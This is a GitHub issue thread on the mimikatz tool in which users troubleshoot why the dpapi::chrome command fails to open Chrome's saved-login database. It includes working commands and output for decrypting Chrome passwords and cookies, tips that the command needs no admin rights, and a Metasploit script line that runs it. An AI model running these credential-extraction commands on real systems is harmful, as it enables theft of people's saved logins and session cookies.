search

gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz
19.51k stars 3.75k forks source link

ERROR kuhl_m_dpapi_chrome #251

Closed Papotito123 closed 4 years ago

Papotito123 commented 4 years ago

Hello: I open this new issue about dpapi chrome.

C:\Users\TESTACCOUNT\Downloads\mimikatz 2.2.0 20200104 - lsadump & Chrome\mimikatz_trunk (1)\x64>mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # log
Using 'mimikatz.log' for logfile : OK

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 /unprotect
ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\google\chrome\USERDA~1\default\LOGIND~1)

mimikatz # dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 /protect
ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\google\chrome\USERDA~1\default\LOGIND~1)

Chrome logins are retrievable with other tools.

Thanks.

gentilkiwi commented 4 years ago

Why can't you paste nice output :') I edited your message.

You know the help about the command is: /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data", with "" around the full path? Why don't you use it instead of this Windows 95 old school like path name? :')

Papotito123 commented 4 years ago

Hello: Thanks for response. I have been using this 95 look-like command without "" for more than 1 year working good. But I will take your hint and try it.

I put what I thought is better than my explanation,and is the output of your tool.

I am using Windows 10 1809 x64 physical machine.

So much thanks for reply.

Papotito123 commented 4 years ago

Hello; I run mimkatz 2.2.0 20200104 - lsadump & Chrome in a Win 10 1809 x64 OS with Avast disabled in a cmd run as Admin. As you suggest ,I try it with your hint. And this is the cmd output: Microsoft Windows [Version 10.0.17763.914] (c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd "C:\Users\TESTACCOUNT\Downloads\mimikatz 2.2.0 20200104 - lsadump & Chrome\mimikatz_trunk (1)\x64"

C:\Users\TESTACCOUNT\Downloads\mimikatz 2.2.0 20200104 - lsadump & Chrome\mimikatz_trunk (1)\x64>mimikatz.exe

.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

/ \ ## /*** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )

\ / ## > http://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # log Using 'mimikatz.log' for logfile : OK

mimikatz # privilege::debug Privilege '20' OK

mimikatz # dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 /unprotect ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\google\chrome\USERDA~1\default\LOGIND~1)

mimikatz # dpapi::chrome /in:"%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" /unprotect ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\google\chrome\USERDA~1\default\LOGIND~1)

mimikatz # dpapi::chrome /in:""%localappdata%\google\chrome\USERDA~1\default\LOGIND~1"" /unprotect ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\google\chrome\USERDA~1\default\LOGIND~1)

mimikatz # dpapi::chrome /in:""C:\Users\TESTACCOUNT\AppData\Local\Google\Chrome\User Data\Default\Login Data"" /unprotect ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\Google\Chrome\User)

mimikatz # dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect

Host : .1rx.io ( / ) Name : _rxuuid Dates : 12/8/2019 7:35:46 PM -> 12/7/2020 7:35:46 PM

Host : .254a.com ( / ) Name : tuuid Dates : 11/25/2019 11:34:49 PM -> 2/23/2020 11:34:49 PM

Host : .254a.com ( / ) Name : tuuid_lu Dates : 11/25/2019 11:34:49 PM -> 2/23/2020 11:34:49 PM

Host : .2checkout.com ( / ) Name : AVGAFF%95%B5%A8%E5%96%B6%80~ Dates : 12/27/2019 8:46:01 PM -> 4/25/2020 8:46:00 PM

Host : .2checkout.com ( / ) Name : AVGAFF%96%DB%A8%9F%96%A6%80~ Dates : 11/17/2019 8:09:26 PM -> 5/15/2020 8:09:26 PM

Host : .2checkout.com ( / ) Name : GKD Dates : 11/17/2019 8:09:26 PM -> 9/25/2029 8:09:26 PM

Host : .2checkout.com ( / ) Name : visid_incap_1635453 Dates : 11/17/2019 8:09:26 PM -> 11/16/2020 7:03:20 AM

Host : .33across.com ( / ) Name : 33x_ps Dates : 1/2/2020 11:26:27 PM -> 1/1/2021 11:26:34 PM

Host : .360yield.com ( / ) Name : fh Dates : 12/18/2019 11:23:06 PM -> 3/17/2020 11:23:06 PM

Host : .360yield.com ( / ) Name : tuuid Dates : 11/17/2019 7:57:28 PM -> 3/10/2020 11:10:12 PM

Host : .360yield.com ( / ) Name : tuuid_lu Dates : 12/11/2019 11:10:12 PM -> 3/10/2020 11:10:12 PM

C:\Users\TESTACCOUNT\Downloads\mimikatz 2.2.0 20200104 - lsadump & Chrome\mimikatz_trunk (1)\x64>

Did you see I can run same command for cookies and do well ? What intrigue me is why I can run 5 other chrome recovering tools with success. And mimikatz failed to open the Login Data file.But still can open cookies.

I also run mimikatz in a virtualbox Windows 10 1809 x64 VM with Avast disabled. This is the cmd output: Microsoft Windows [Version 10.0.17763.914] (c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd "C:\Users\testuser\Desktop\mimikatz 2.2.0 20200104 - lsadump & Chrome\mimikatz_trunk (1)\x64"

C:\Users\testuser\Desktop\mimikatz 2.2.0 20200104 - lsadump & Chrome\mimikatz_trunk (1)\x64>mimikatz.exe

.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

/ \ ## /*** Benjamin DELPY gentilkiwi ( benjamin@gentilkiwi.com )

\ / ## > http://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz # log Using 'mimikatz.log' for logfile : OK

mimikatz # privilege::debug Privilege '20' OK

mimikatz # dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1 /unprotect

URL : https://login.live.com/ ( https://login.live.com/login.srf ) Username: xxxxxxxxxx@outlook.com

URL : https://login.live.com/ ( https://login.live.com/login.srf ) Username: xxxxxxxxxx@hotmail.com

mimikatz #

I want to use simple old syntax with cmd/bat and for the lesser powershell commands just to have the benefit to be run from Windows 7 to latest Windows 10 with highest margin of success. I have been using mimikatz from 2012.

Thanks for responding and for any help.

gentilkiwi commented 4 years ago

As indicated in my previous message, use the syntax: dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data"

Papotito123 commented 4 years ago

Hello: I run mimikatz without quotes,with single quotes,with double quotes and did the same; ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\Google\Chrome\User)

Do you read the part where I mention that I run mimikatz in a vbox Win 10 1809 x64 VM ,that did well and also posted the output ?

Thanks for taking time.

Papotito123 commented 4 years ago

Hello: Sorry ,was not my intention to Close issue.I 'm doing post from a smartphone.

gentilkiwi commented 4 years ago

ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file (C:\Users\TESTACCOUNT\AppData\Local\Google\Chrome\User)indicate that you don't type my command in mimikatz. Stop doing batch if you don't know how to escape and/or use them.

Papotito123 commented 4 years ago

Hello; To be honest, you were right in the part about the command syntax is not good. I have been using in this way from the very moment you release dpapi::chrome /unprotect. But don't worry.I manage to use other syntax that works well. Chrome accounts a recovering as usual.

Thanks for your patience.

merrychrishna commented 3 years ago

Hello; To be honest, you were right in the part about the command syntax is not good. I have been using in this way from the very moment you release dpapi::chrome /unprotect. But don't worry.I manage to use other syntax that works well. Chrome accounts a recovering as usual.

Thanks for your patience.

what other syntax did you use? Im having the same problem so would like to know.

Papotito123 commented 3 years ago

Hello: Well.. This issue ,as for me, seems to be with Defender doing some in background even if Disabled.

The format I'm using is. dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data/Default\Login Data" /unprptect

This is working.as this in my Win 1909 and Win 20H1. For some reason when using short env path was failing .So I don't use it.

A little tip.To use this dpapi::chrome command is doesn't needed to run first , privilege::debug. Also, you can run this in a Standard user account without running mimikatz (Run As ...)..

ForDockerImage commented 3 years ago

Hello,

i run mimikatz from script ".rc" in metasploit in the following way: <ruby> run_single("kiwi_cmd \"dpapi::chrome /in:'%localappdata%\\Google\\Chrome\\User Data\\Default\\Login Data' /unprotect\"") </ruby>

Error: ERROR kull_m_file_readGeneric ; kull_m_string_quick_base64_to_Binary (0x0000000d) ERROR kuhl_m_dpapi_chrome ; sqlite3_open_v2: unable to open database file ('C:\Users\Tester\AppData\Local\Google\Chrome\User)

Why mimikztz process the path up to the first space? ps: sorry for bad english